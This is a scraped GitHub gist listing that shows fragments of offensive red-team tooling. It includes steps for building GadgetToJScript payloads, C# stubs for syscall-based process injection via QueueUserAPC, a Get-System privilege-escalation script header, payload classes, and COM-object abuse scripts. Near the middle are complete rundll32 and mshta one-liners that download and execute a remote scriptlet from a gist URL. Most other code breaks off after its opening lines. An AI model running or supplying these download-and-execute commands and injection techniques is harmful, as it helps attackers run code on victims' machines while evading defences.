@MHaggis
MHaggis / lolbins.json
Last active June 26, 2019 01:32
lolbins
{
"Powershell": {
"process_name": ["powershell.exe"]
},
"Utilman": {
"process_name": ["utilman.exe"]
},
"msiexec": {
"process_name": ["msiexec.exe"]
},
@med0x2e
med0x2e / steps.txt
Last active September 18, 2021 19:58
Steps to run GadgetToJScript on linux (wine)
Steps:
1- apt-get install mono-complete
2- apt-get install wine winetricks -y
3- winetricks dotnet35
4- winetricks dotnet48
5- dpkg --add-architecture i386 && apt-get update && apt-get install wine32
6- rm -Rf ~/.wine
7- WINEPREFIX=~/.wine32 WINEARCH=win32 wineboot
8- wine GadgetToJScript.NET3.5.exe -r -c helloworld.cs -d System.Windows.Forms.dll -w hta -o hello
@ChoiSG
ChoiSG / dinvokeSyscall.cs
Created May 7, 2021 18:37
dinvoke with syscall - created for blog post
using System;
using DInvoke;
using System.Diagnostics;
using System.Runtime.InteropServices;
using DynamicInvoke = DInvoke.DynamicInvoke;
using Data = DInvoke.Data;
namespace dinvokeSyscall
{
class Program
@rvrsh3ll
rvrsh3ll / DInjectQueuerAPC.cs
Created November 20, 2020 15:10 — forked from jfmaes/DInjectQueuerAPC.cs
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
namespace DinjectorWithQUserAPC
{
public class Program
@milo2012
milo2012 / Get-System.ps1
Last active November 22, 2021 18:50
Get-System.ps1
function Get-System {
<#
.SYNOPSIS
GetSystem functionality inspired by Meterpreter's getsystem.
Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: PSReflect
using System;
using System.IO;
using System.Net;
using System.Diagnostics;
using System.IO.Compression;
using System.Runtime.InteropServices;
public class Payload
{
public Payload()
@sammbertram
sammbertram / dynwrap.js
Created June 3, 2017 09:55
RegistrationFree DynamicWrapperX
var actCtx = new ActiveXObject( "Microsoft.Windows.ActCtx" );
actCtx.Manifest = "C:\\Tools\\COM\\dynwrap.test.manifest";
try
{
var DX = actCtx.CreateObject("DynamicWrapperX");
DX.Register("user32.dll", "MessageBoxW", "i=hwwu", "r=l"); // Register a dll function.
res = DX.MessageBoxW(0, "Hello, world!", "Test", 4); // Call the function.
}
catch(e){ WScript.Echo("Fail");}
xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}
verclsid.exe /S /C {00000001-0000-0000-0000-0000FEEDACDC}
create new folder and rename file.{00000001-0000-0000-0000-0000FEEDACDC}
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");close();
mshta javascript:o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");o.Exec();close();
using System;
using System.IO;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Net;
using System.IO.Compression;
public class Payload
{
@mrpapercut
mrpapercut / 01.Callable_COM_Objects.txt
Last active September 29, 2023 13:22
Callable & uncallable COMObjects in wscript/cscript
// The following COMobjects are all callable in cscript with WScript.CreateObject(COMObject)
ADODB.Command is callable!
ADODB.Command.6.0 is callable!
ADODB.Connection is callable!
ADODB.Connection.6.0 is callable!
ADODB.Error is callable!
ADODB.Error.6.0 is callable!
ADODB.Parameter is callable!
ADODB.Parameter.6.0 is callable!
ADODB.Record is callable!